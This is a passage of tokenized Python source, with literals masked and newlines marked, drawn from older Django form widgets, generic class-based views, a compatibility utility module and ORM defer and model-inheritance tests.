render_options ( choices , [ value ] ) <EOL> if options : <EOL> output . append ( options ) <EOL> output . append ( u'<STR_LIT>' ) <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( output ) ) <EOL> def render_option ( self , selected_choices , option_value , option_label ) : <EOL> option_value = force_unicode ( option_value ) <EOL> if option_value in selected_choices : <EOL> selected_html = u'<STR_LIT>' <EOL> if not self . allow_multiple_selected : <EOL> selected_choices . remove ( option_value ) <EOL> else : <EOL> selected_html = '<STR_LIT>' <EOL> return u'<STR_LIT>' % ( <EOL> escape ( option_value ) , selected_html , <EOL> conditional_escape ( force_unicode ( option_label ) ) ) <EOL> def render_options ( self , choices , selected_choices ) : <EOL> selected_choices = set ( force_unicode ( v ) for v in selected_choices ) <EOL> output = [ ] <EOL> for option_value , option_label in chain ( self . choices , choices ) : <EOL> if isinstance ( option_label , ( list , tuple ) ) : <EOL> output . append ( u'<STR_LIT>' % escape ( force_unicode ( option_value ) ) ) <EOL> for option in option_label : <EOL> output . append ( self . render_option ( selected_choices , * option ) ) <EOL> output . append ( u'<STR_LIT>' ) <EOL> else : <EOL> output . append ( self . render_option ( selected_choices , option_value , option_label ) ) <EOL> return u'<STR_LIT:\n>' . join ( output ) <EOL> class NullBooleanSelect ( Select ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None ) : <EOL> choices = ( ( u'<STR_LIT:1>' , ugettext_lazy ( '<STR_LIT>' ) ) , <EOL> ( u'<STR_LIT:2>' , ugettext_lazy ( '<STR_LIT>' ) ) , <EOL> ( u'<STR_LIT:3>' , ugettext_lazy ( '<STR_LIT>' ) ) ) <EOL> super ( NullBooleanSelect , self ) . 
__init__ ( attrs , choices ) <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> try : <EOL> value = { True : u'<STR_LIT:2>' , False : u'<STR_LIT:3>' , u'<STR_LIT:2>' : u'<STR_LIT:2>' , u'<STR_LIT:3>' : u'<STR_LIT:3>' } [ value ] <EOL> except KeyError : <EOL> value = u'<STR_LIT:1>' <EOL> return super ( NullBooleanSelect , self ) . render ( name , value , attrs , choices ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> value = data . get ( name , None ) <EOL> return { u'<STR_LIT:2>' : True , <EOL> True : True , <EOL> '<STR_LIT:True>' : True , <EOL> u'<STR_LIT:3>' : False , <EOL> '<STR_LIT:False>' : False , <EOL> False : False } . get ( value , None ) <EOL> def _has_changed ( self , initial , data ) : <EOL> if initial is not None : <EOL> initial = bool ( initial ) <EOL> if data is not None : <EOL> data = bool ( data ) <EOL> return initial != data <EOL> class SelectMultiple ( Select ) : <EOL> allow_multiple_selected = True <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> if value is None : value = [ ] <EOL> final_attrs = self . build_attrs ( attrs , name = name ) <EOL> output = [ u'<STR_LIT>' % flatatt ( final_attrs ) ] <EOL> options = self . render_options ( choices , value ) <EOL> if options : <EOL> output . append ( options ) <EOL> output . append ( '<STR_LIT>' ) <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( output ) ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> if isinstance ( data , ( MultiValueDict , MergeDict ) ) : <EOL> return data . getlist ( name ) <EOL> return data . 
get ( name , None ) <EOL> def _has_changed ( self , initial , data ) : <EOL> if initial is None : <EOL> initial = [ ] <EOL> if data is None : <EOL> data = [ ] <EOL> if len ( initial ) != len ( data ) : <EOL> return True <EOL> initial_set = set ( [ force_unicode ( value ) for value in initial ] ) <EOL> data_set = set ( [ force_unicode ( value ) for value in data ] ) <EOL> return data_set != initial_set <EOL> class RadioInput ( SubWidget ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , value , attrs , choice , index ) : <EOL> self . name , self . value = name , value <EOL> self . attrs = attrs <EOL> self . choice_value = force_unicode ( choice [ <NUM_LIT:0> ] ) <EOL> self . choice_label = force_unicode ( choice [ <NUM_LIT:1> ] ) <EOL> self . index = index <EOL> def __unicode__ ( self ) : <EOL> return self . render ( ) <EOL> def render ( self , name = None , value = None , attrs = None , choices = ( ) ) : <EOL> name = name or self . name <EOL> value = value or self . value <EOL> attrs = attrs or self . attrs <EOL> if '<STR_LIT:id>' in self . attrs : <EOL> label_for = '<STR_LIT>' % ( self . attrs [ '<STR_LIT:id>' ] , self . index ) <EOL> else : <EOL> label_for = '<STR_LIT>' <EOL> choice_label = conditional_escape ( force_unicode ( self . choice_label ) ) <EOL> return mark_safe ( u'<STR_LIT>' % ( label_for , self . tag ( ) , choice_label ) ) <EOL> def is_checked ( self ) : <EOL> return self . value == self . choice_value <EOL> def tag ( self ) : <EOL> if '<STR_LIT:id>' in self . attrs : <EOL> self . attrs [ '<STR_LIT:id>' ] = '<STR_LIT>' % ( self . attrs [ '<STR_LIT:id>' ] , self . index ) <EOL> final_attrs = dict ( self . attrs , type = '<STR_LIT>' , name = self . name , value = self . choice_value ) <EOL> if self . 
is_checked ( ) : <EOL> final_attrs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return mark_safe ( u'<STR_LIT>' % flatatt ( final_attrs ) ) <EOL> class RadioFieldRenderer ( StrAndUnicode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , value , attrs , choices ) : <EOL> self . name , self . value , self . attrs = name , value , attrs <EOL> self . choices = choices <EOL> def __iter__ ( self ) : <EOL> for i , choice in enumerate ( self . choices ) : <EOL> yield RadioInput ( self . name , self . value , self . attrs . copy ( ) , choice , i ) <EOL> def __getitem__ ( self , idx ) : <EOL> choice = self . choices [ idx ] <EOL> return RadioInput ( self . name , self . value , self . attrs . copy ( ) , choice , idx ) <EOL> def __unicode__ ( self ) : <EOL> return self . render ( ) <EOL> def render ( self ) : <EOL> """<STR_LIT>""" <EOL> return mark_safe ( u'<STR_LIT>' % u'<STR_LIT:\n>' . join ( [ u'<STR_LIT>' <EOL> % force_unicode ( w ) for w in self ] ) ) <EOL> class RadioSelect ( Select ) : <EOL> renderer = RadioFieldRenderer <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> renderer = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if renderer : <EOL> self . renderer = renderer <EOL> super ( RadioSelect , self ) . __init__ ( * args , ** kwargs ) <EOL> def subwidgets ( self , name , value , attrs = None , choices = ( ) ) : <EOL> for widget in self . get_renderer ( name , value , attrs , choices ) : <EOL> yield widget <EOL> def get_renderer ( self , name , value , attrs = None , choices = ( ) ) : <EOL> """<STR_LIT>""" <EOL> if value is None : value = '<STR_LIT>' <EOL> str_value = force_unicode ( value ) <EOL> final_attrs = self . build_attrs ( attrs ) <EOL> choices = list ( chain ( self . choices , choices ) ) <EOL> return self . renderer ( name , str_value , final_attrs , choices ) <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> return self . get_renderer ( name , value , attrs , choices ) . 
render ( ) <EOL> def id_for_label ( self , id_ ) : <EOL> if id_ : <EOL> id_ += '<STR_LIT>' <EOL> return id_ <EOL> class CheckboxSelectMultiple ( SelectMultiple ) : <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> if value is None : value = [ ] <EOL> has_id = attrs and '<STR_LIT:id>' in attrs <EOL> final_attrs = self . build_attrs ( attrs , name = name ) <EOL> output = [ u'<STR_LIT>' ] <EOL> str_values = set ( [ force_unicode ( v ) for v in value ] ) <EOL> for i , ( option_value , option_label ) in enumerate ( chain ( self . choices , choices ) ) : <EOL> if has_id : <EOL> final_attrs = dict ( final_attrs , id = '<STR_LIT>' % ( attrs [ '<STR_LIT:id>' ] , i ) ) <EOL> label_for = u'<STR_LIT>' % final_attrs [ '<STR_LIT:id>' ] <EOL> else : <EOL> label_for = '<STR_LIT>' <EOL> cb = CheckboxInput ( final_attrs , check_test = lambda value : value in str_values ) <EOL> option_value = force_unicode ( option_value ) <EOL> rendered_cb = cb . render ( name , option_value ) <EOL> option_label = conditional_escape ( force_unicode ( option_label ) ) <EOL> output . append ( u'<STR_LIT>' % ( label_for , rendered_cb , option_label ) ) <EOL> output . append ( u'<STR_LIT>' ) <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( output ) ) <EOL> def id_for_label ( self , id_ ) : <EOL> if id_ : <EOL> id_ += '<STR_LIT>' <EOL> return id_ <EOL> class MultiWidget ( Widget ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , widgets , attrs = None ) : <EOL> self . widgets = [ isinstance ( w , type ) and w ( ) or w for w in widgets ] <EOL> super ( MultiWidget , self ) . __init__ ( attrs ) <EOL> def render ( self , name , value , attrs = None ) : <EOL> if self . is_localized : <EOL> for widget in self . widgets : <EOL> widget . is_localized = self . is_localized <EOL> if not isinstance ( value , list ) : <EOL> value = self . decompress ( value ) <EOL> output = [ ] <EOL> final_attrs = self . build_attrs ( attrs ) <EOL> id_ = final_attrs . 
get ( '<STR_LIT:id>' , None ) <EOL> for i , widget in enumerate ( self . widgets ) : <EOL> try : <EOL> widget_value = value [ i ] <EOL> except IndexError : <EOL> widget_value = None <EOL> if id_ : <EOL> final_attrs = dict ( final_attrs , id = '<STR_LIT>' % ( id_ , i ) ) <EOL> output . append ( widget . render ( name + '<STR_LIT>' % i , widget_value , final_attrs ) ) <EOL> return mark_safe ( self . format_output ( output ) ) <EOL> def id_for_label ( self , id_ ) : <EOL> if id_ : <EOL> id_ += '<STR_LIT>' <EOL> return id_ <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> return [ widget . value_from_datadict ( data , files , name + '<STR_LIT>' % i ) for i , widget in enumerate ( self . widgets ) ] <EOL> def _has_changed ( self , initial , data ) : <EOL> if initial is None : <EOL> initial = [ u'<STR_LIT>' for x in range ( <NUM_LIT:0> , len ( data ) ) ] <EOL> else : <EOL> if not isinstance ( initial , list ) : <EOL> initial = self . decompress ( initial ) <EOL> for widget , initial , data in zip ( self . widgets , initial , data ) : <EOL> if widget . _has_changed ( initial , data ) : <EOL> return True <EOL> return False <EOL> def format_output ( self , rendered_widgets ) : <EOL> """<STR_LIT>""" <EOL> return u'<STR_LIT>' . join ( rendered_widgets ) <EOL> def decompress ( self , value ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def _get_media ( self ) : <EOL> "<STR_LIT>" <EOL> media = Media ( ) <EOL> for w in self . widgets : <EOL> media = media + w . media <EOL> return media <EOL> media = property ( _get_media ) <EOL> def __deepcopy__ ( self , memo ) : <EOL> obj = super ( MultiWidget , self ) . __deepcopy__ ( memo ) <EOL> obj . widgets = copy . deepcopy ( self . 
widgets ) <EOL> return obj <EOL> class SplitDateTimeWidget ( MultiWidget ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None , date_format = None , time_format = None ) : <EOL> widgets = ( DateInput ( attrs = attrs , format = date_format ) , <EOL> TimeInput ( attrs = attrs , format = time_format ) ) <EOL> super ( SplitDateTimeWidget , self ) . __init__ ( widgets , attrs ) <EOL> def decompress ( self , value ) : <EOL> if value : <EOL> value = to_current_timezone ( value ) <EOL> return [ value . date ( ) , value . time ( ) . replace ( microsecond = <NUM_LIT:0> ) ] <EOL> return [ None , None ] <EOL> class SplitHiddenDateTimeWidget ( SplitDateTimeWidget ) : <EOL> """<STR_LIT>""" <EOL> is_hidden = True <EOL> def __init__ ( self , attrs = None , date_format = None , time_format = None ) : <EOL> super ( SplitHiddenDateTimeWidget , self ) . __init__ ( attrs , date_format , time_format ) <EOL> for widget in self . widgets : <EOL> widget . input_type = '<STR_LIT>' <EOL> widget . is_hidden = True </s>
<s> """<STR_LIT>""" <EOL> from django . test . client import Client , RequestFactory <EOL> from django . test . testcases import ( TestCase , TransactionTestCase , <EOL> SimpleTestCase , LiveServerTestCase , skipIfDBFeature , <EOL> skipUnlessDBFeature ) <EOL> from django . test . utils import Approximate </s>
<s> """<STR_LIT>""" <EOL> import __builtin__ <EOL> import itertools <EOL> import warnings <EOL> def product ( * args , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> pools = map ( tuple , args ) * kwds . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> result = [ [ ] ] <EOL> for pool in pools : <EOL> result = [ x + [ y ] for x in result for y in pool ] <EOL> for prod in result : <EOL> yield tuple ( prod ) <EOL> if hasattr ( itertools , '<STR_LIT>' ) : <EOL> product = itertools . product <EOL> def is_iterable ( x ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> iter ( x ) <EOL> except TypeError : <EOL> return False <EOL> else : <EOL> return True <EOL> def all ( iterable ) : <EOL> warnings . warn ( "<STR_LIT>" , <EOL> PendingDeprecationWarning ) <EOL> return __builtin__ . all ( iterable ) <EOL> def any ( iterable ) : <EOL> warnings . warn ( "<STR_LIT>" , <EOL> PendingDeprecationWarning ) <EOL> return __builtin__ . any ( iterable ) </s>
<s> from functools import update_wrapper <EOL> from django import http <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . template . response import TemplateResponse <EOL> from django . utils . log import getLogger <EOL> from django . utils . decorators import classonlymethod <EOL> logger = getLogger ( '<STR_LIT>' ) <EOL> class View ( object ) : <EOL> """<STR_LIT>""" <EOL> http_method_names = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for key , value in kwargs . iteritems ( ) : <EOL> setattr ( self , key , value ) <EOL> @ classonlymethod <EOL> def as_view ( cls , ** initkwargs ) : <EOL> """<STR_LIT>""" <EOL> for key in initkwargs : <EOL> if key in cls . http_method_names : <EOL> raise TypeError ( u"<STR_LIT>" <EOL> u"<STR_LIT>" <EOL> % ( key , cls . __name__ ) ) <EOL> if not hasattr ( cls , key ) : <EOL> raise TypeError ( u"<STR_LIT>" % ( <EOL> cls . __name__ , key ) ) <EOL> def view ( request , * args , ** kwargs ) : <EOL> self = cls ( ** initkwargs ) <EOL> if hasattr ( self , '<STR_LIT>' ) and not hasattr ( self , '<STR_LIT>' ) : <EOL> self . head = self . get <EOL> return self . dispatch ( request , * args , ** kwargs ) <EOL> update_wrapper ( view , cls , updated = ( ) ) <EOL> update_wrapper ( view , cls . dispatch , assigned = ( ) ) <EOL> return view <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> if request . method . lower ( ) in self . http_method_names : <EOL> handler = getattr ( self , request . method . lower ( ) , self . http_method_not_allowed ) <EOL> else : <EOL> handler = self . http_method_not_allowed <EOL> self . request = request <EOL> self . args = args <EOL> self . kwargs = kwargs <EOL> return handler ( request , * args , ** kwargs ) <EOL> def http_method_not_allowed ( self , request , * args , ** kwargs ) : <EOL> allowed_methods = [ m for m in self . 
http_method_names if hasattr ( self , m ) ] <EOL> logger . warning ( '<STR_LIT>' , request . method , request . path , <EOL> extra = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : self . request <EOL> } <EOL> ) <EOL> return http . HttpResponseNotAllowed ( allowed_methods ) <EOL> class TemplateResponseMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> template_name = None <EOL> response_class = TemplateResponse <EOL> def render_to_response ( self , context , ** response_kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . response_class ( <EOL> request = self . request , <EOL> template = self . get_template_names ( ) , <EOL> context = context , <EOL> ** response_kwargs <EOL> ) <EOL> def get_template_names ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . template_name is None : <EOL> raise ImproperlyConfigured ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> return [ self . template_name ] <EOL> class TemplateView ( TemplateResponseMixin , View ) : <EOL> """<STR_LIT>""" <EOL> def get_context_data ( self , ** kwargs ) : <EOL> return { <EOL> '<STR_LIT>' : kwargs <EOL> } <EOL> def get ( self , request , * args , ** kwargs ) : <EOL> context = self . get_context_data ( ** kwargs ) <EOL> return self . render_to_response ( context ) <EOL> class RedirectView ( View ) : <EOL> """<STR_LIT>""" <EOL> permanent = True <EOL> url = None <EOL> query_string = False <EOL> def get_redirect_url ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if self . url : <EOL> url = self . url % kwargs <EOL> args = self . request . META . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if args and self . query_string : <EOL> url = "<STR_LIT>" % ( url , args ) <EOL> return url <EOL> else : <EOL> return None <EOL> def get ( self , request , * args , ** kwargs ) : <EOL> url = self . get_redirect_url ( ** kwargs ) <EOL> if url : <EOL> if self . permanent : <EOL> return http . HttpResponsePermanentRedirect ( url ) <EOL> else : <EOL> return http . 
HttpResponseRedirect ( url ) <EOL> else : <EOL> logger . warning ( '<STR_LIT>' , self . request . path , <EOL> extra = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : self . request <EOL> } ) <EOL> return http . HttpResponseGone ( ) <EOL> def head ( self , request , * args , ** kwargs ) : <EOL> return self . get ( request , * args , ** kwargs ) <EOL> def post ( self , request , * args , ** kwargs ) : <EOL> return self . get ( request , * args , ** kwargs ) <EOL> def options ( self , request , * args , ** kwargs ) : <EOL> return self . get ( request , * args , ** kwargs ) <EOL> def delete ( self , request , * args , ** kwargs ) : <EOL> return self . get ( request , * args , ** kwargs ) <EOL> def put ( self , request , * args , ** kwargs ) : <EOL> return self . get ( request , * args , ** kwargs ) </s>
<s> from __future__ import absolute_import <EOL> from django . db . models . query_utils import DeferredAttribute <EOL> from django . test import TestCase <EOL> from . models import Secondary , Primary , Child , BigChild , ChildProxy <EOL> class DeferTests ( TestCase ) : <EOL> def assert_delayed ( self , obj , num ) : <EOL> count = <NUM_LIT:0> <EOL> for field in obj . _meta . fields : <EOL> if isinstance ( obj . __class__ . __dict__ . get ( field . attname ) , <EOL> DeferredAttribute ) : <EOL> count += <NUM_LIT:1> <EOL> self . assertEqual ( count , num ) <EOL> def test_defer ( self ) : <EOL> s1 = Secondary . objects . create ( first = "<STR_LIT>" , second = "<STR_LIT>" ) <EOL> p1 = Primary . objects . create ( name = "<STR_LIT>" , value = "<STR_LIT>" , related = s1 ) <EOL> qs = Primary . objects . all ( ) <EOL> self . assert_delayed ( qs . defer ( "<STR_LIT:name>" ) [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assert_delayed ( qs . only ( "<STR_LIT:name>" ) [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assert_delayed ( qs . defer ( "<STR_LIT>" ) [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> self . assert_delayed ( qs . only ( "<STR_LIT>" ) [ <NUM_LIT:0> ] , <NUM_LIT:3> ) <EOL> obj = qs . select_related ( ) . only ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> self . assert_delayed ( obj , <NUM_LIT:2> ) <EOL> self . assertEqual ( obj . related_id , s1 . pk ) <EOL> self . assert_delayed ( s1 . primary_set . all ( ) . only ( '<STR_LIT>' ) [ <NUM_LIT:0> ] , <NUM_LIT:3> ) <EOL> self . assert_delayed ( qs . defer ( "<STR_LIT:name>" ) . extra ( select = { "<STR_LIT:a>" : <NUM_LIT:1> } ) [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assert_delayed ( qs . extra ( select = { "<STR_LIT:a>" : <NUM_LIT:1> } ) . defer ( "<STR_LIT:name>" ) [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assert_delayed ( qs . defer ( "<STR_LIT:name>" ) . defer ( "<STR_LIT:value>" ) [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assert_delayed ( qs . only ( "<STR_LIT:name>" ) . 
only ( "<STR_LIT:value>" ) [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assert_delayed ( qs . only ( "<STR_LIT:name>" ) . defer ( "<STR_LIT:value>" ) [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assert_delayed ( qs . only ( "<STR_LIT:name>" , "<STR_LIT:value>" ) . defer ( "<STR_LIT:value>" ) [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assert_delayed ( qs . defer ( "<STR_LIT:name>" ) . only ( "<STR_LIT:value>" ) [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> obj = qs . only ( ) [ <NUM_LIT:0> ] <EOL> self . assert_delayed ( qs . defer ( None ) [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> self . assert_delayed ( qs . only ( "<STR_LIT:name>" ) . defer ( None ) [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> self . assertEqual ( qs . defer ( "<STR_LIT:name>" ) . values ( ) [ <NUM_LIT:0> ] , { <EOL> "<STR_LIT:id>" : p1 . id , <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:value>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : s1 . id , <EOL> } ) <EOL> self . assertEqual ( qs . only ( "<STR_LIT:name>" ) . values ( ) [ <NUM_LIT:0> ] , { <EOL> "<STR_LIT:id>" : p1 . id , <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:value>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : s1 . id , <EOL> } ) <EOL> self . assert_delayed ( qs . defer ( "<STR_LIT:name>" ) . get ( pk = p1 . pk ) , <NUM_LIT:1> ) <EOL> self . assert_delayed ( qs . only ( "<STR_LIT:name>" ) . get ( pk = p1 . pk ) , <NUM_LIT:2> ) <EOL> self . assert_delayed ( qs . only ( "<STR_LIT:name>" ) . select_related ( "<STR_LIT>" ) [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assert_delayed ( qs . defer ( "<STR_LIT>" ) . select_related ( "<STR_LIT>" ) [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> obj = Primary . objects . defer ( "<STR_LIT:value>" ) . get ( name = "<STR_LIT>" ) <EOL> obj . name = "<STR_LIT>" <EOL> obj . save ( ) <EOL> self . assertQuerysetEqual ( <EOL> Primary . objects . all ( ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> lambda p : p . name <EOL> ) <EOL> Child . objects . 
create ( name = "<STR_LIT>" , value = "<STR_LIT:foo>" , related = s1 ) <EOL> obj = Child . objects . defer ( "<STR_LIT:value>" ) . get ( name = "<STR_LIT>" ) <EOL> self . assert_delayed ( obj , <NUM_LIT:1> ) <EOL> self . assertEqual ( obj . name , "<STR_LIT>" ) <EOL> self . assertEqual ( obj . value , "<STR_LIT:foo>" ) <EOL> obj . name = "<STR_LIT>" <EOL> obj . save ( ) <EOL> obj = Child . objects . only ( "<STR_LIT:name>" ) . get ( name = "<STR_LIT>" ) <EOL> self . assert_delayed ( obj , <NUM_LIT:3> ) <EOL> self . assertEqual ( obj . name , "<STR_LIT>" ) <EOL> self . assertEqual ( obj . value , "<STR_LIT:foo>" ) <EOL> obj . name = "<STR_LIT>" <EOL> obj . save ( ) <EOL> BigChild . objects . create ( name = "<STR_LIT>" , value = "<STR_LIT:foo>" , related = s1 , other = "<STR_LIT:bar>" ) <EOL> obj = BigChild . objects . defer ( "<STR_LIT:value>" ) . get ( name = "<STR_LIT>" ) <EOL> self . assert_delayed ( obj , <NUM_LIT:1> ) <EOL> self . assertEqual ( obj . name , "<STR_LIT>" ) <EOL> self . assertEqual ( obj . value , "<STR_LIT:foo>" ) <EOL> self . assertEqual ( obj . other , "<STR_LIT:bar>" ) <EOL> obj . name = "<STR_LIT>" <EOL> obj . save ( ) <EOL> obj = BigChild . objects . defer ( "<STR_LIT>" ) . get ( name = "<STR_LIT>" ) <EOL> self . assert_delayed ( obj , <NUM_LIT:1> ) <EOL> self . assertEqual ( obj . name , "<STR_LIT>" ) <EOL> self . assertEqual ( obj . value , "<STR_LIT:foo>" ) <EOL> self . assertEqual ( obj . other , "<STR_LIT:bar>" ) <EOL> obj . name = "<STR_LIT>" <EOL> obj . save ( ) <EOL> obj = BigChild . objects . only ( "<STR_LIT:name>" ) . get ( name = "<STR_LIT>" ) <EOL> self . assert_delayed ( obj , <NUM_LIT:4> ) <EOL> self . assertEqual ( obj . name , "<STR_LIT>" ) <EOL> self . assertEqual ( obj . value , "<STR_LIT:foo>" ) <EOL> self . assertEqual ( obj . other , "<STR_LIT:bar>" ) <EOL> obj . name = "<STR_LIT>" <EOL> obj . save ( ) <EOL> obj = BigChild . objects . only ( "<STR_LIT>" ) . get ( name = "<STR_LIT>" ) <EOL> self . 
assert_delayed ( obj , <NUM_LIT:4> ) <EOL> self . assertEqual ( obj . name , "<STR_LIT>" ) <EOL> self . assertEqual ( obj . value , "<STR_LIT:foo>" ) <EOL> self . assertEqual ( obj . other , "<STR_LIT:bar>" ) <EOL> obj . name = "<STR_LIT>" <EOL> obj . save ( ) <EOL> def test_defer_proxy ( self ) : <EOL> """<STR_LIT>""" <EOL> related = Secondary . objects . create ( first = '<STR_LIT>' , second = '<STR_LIT>' ) <EOL> ChildProxy . objects . create ( name = '<STR_LIT>' , value = '<STR_LIT>' , related = related ) <EOL> children = ChildProxy . objects . all ( ) . select_related ( ) . only ( '<STR_LIT:id>' , '<STR_LIT:name>' ) <EOL> self . assertEqual ( len ( children ) , <NUM_LIT:1> ) <EOL> child = children [ <NUM_LIT:0> ] <EOL> self . assert_delayed ( child , <NUM_LIT:1> ) <EOL> self . assertEqual ( child . name , '<STR_LIT>' ) <EOL> self . assertEqual ( child . value , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from django . db import models <EOL> class Person ( models . Model ) : <EOL> first_name = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> last_name = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> birthday = models . DateField ( ) <EOL> def __unicode__ ( self ) : <EOL> return u'<STR_LIT>' % ( self . first_name , self . last_name ) <EOL> class ManualPrimaryKeyTest ( models . Model ) : <EOL> id = models . IntegerField ( primary_key = True ) <EOL> data = models . CharField ( max_length = <NUM_LIT:100> ) </s>
<s> from __future__ import absolute_import <EOL> from operator import attrgetter <EOL> from django . core . exceptions import FieldError <EOL> from django . test import TestCase <EOL> from . models import ( Chef , CommonInfo , ItalianRestaurant , ParkingLot , Place , <EOL> Post , Restaurant , Student , StudentWorker , Supplier , Worker , MixinModel ) <EOL> class ModelInheritanceTests ( TestCase ) : <EOL> def test_abstract ( self ) : <EOL> w1 = Worker . objects . create ( name = "<STR_LIT>" , age = <NUM_LIT> , job = "<STR_LIT>" ) <EOL> w2 = Worker . objects . create ( name = "<STR_LIT>" , age = <NUM_LIT> , job = "<STR_LIT>" ) <EOL> s = Student . objects . create ( name = "<STR_LIT>" , age = <NUM_LIT:5> , school_class = "<STR_LIT>" ) <EOL> self . assertEqual ( unicode ( w1 ) , "<STR_LIT>" ) <EOL> self . assertEqual ( unicode ( s ) , "<STR_LIT>" ) <EOL> self . assertQuerysetEqual ( <EOL> Worker . objects . values ( "<STR_LIT:name>" ) , [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" } , <EOL> ] , <EOL> lambda o : o <EOL> ) <EOL> self . assertEqual ( Student . _meta . ordering , [ ] ) <EOL> self . assertRaises ( AttributeError , lambda : CommonInfo . objects . all ( ) ) <EOL> self . assertRaises ( Student . DoesNotExist , <EOL> StudentWorker . objects . get , pk = <NUM_LIT> <EOL> ) <EOL> self . assertRaises ( Worker . DoesNotExist , <EOL> StudentWorker . objects . get , pk = <NUM_LIT> <EOL> ) <EOL> sw1 = StudentWorker ( ) <EOL> sw1 . name = "<STR_LIT>" <EOL> sw1 . age = <NUM_LIT> <EOL> sw1 . save ( ) <EOL> sw2 = StudentWorker ( ) <EOL> sw2 . name = "<STR_LIT>" <EOL> sw2 . age = <NUM_LIT> <EOL> sw2 . save ( ) <EOL> self . assertRaises ( Student . MultipleObjectsReturned , <EOL> StudentWorker . objects . get , pk__lt = sw2 . pk + <NUM_LIT:100> <EOL> ) <EOL> self . assertRaises ( Worker . MultipleObjectsReturned , <EOL> StudentWorker . objects . get , pk__lt = sw2 . 
pk + <NUM_LIT:100> <EOL> ) <EOL> def test_multiple_table ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" ) <EOL> post . attached_comment_set . create ( content = "<STR_LIT>" , is_spam = True ) <EOL> post . attached_link_set . create ( <EOL> content = "<STR_LIT>" , <EOL> url = "<STR_LIT>" <EOL> ) <EOL> self . assertRaises ( AttributeError , <EOL> getattr , post , "<STR_LIT>" <EOL> ) <EOL> p1 = Place . objects . create ( name = "<STR_LIT>" , address = "<STR_LIT>" ) <EOL> p2 = Place . objects . create ( name = "<STR_LIT>" , address = "<STR_LIT>" ) <EOL> r = Restaurant . objects . create ( <EOL> name = "<STR_LIT>" , <EOL> address = "<STR_LIT>" , <EOL> serves_hot_dogs = True , <EOL> serves_pizza = False , <EOL> rating = <NUM_LIT:2> <EOL> ) <EOL> c = Chef . objects . create ( name = "<STR_LIT>" ) <EOL> ir = ItalianRestaurant . objects . create ( <EOL> name = "<STR_LIT>" , <EOL> address = "<STR_LIT>" , <EOL> serves_hot_dogs = False , <EOL> serves_pizza = False , <EOL> serves_gnocchi = True , <EOL> rating = <NUM_LIT:4> , <EOL> chef = c <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . filter ( address = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> ir . address = "<STR_LIT>" <EOL> ir . save ( ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . filter ( address = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter 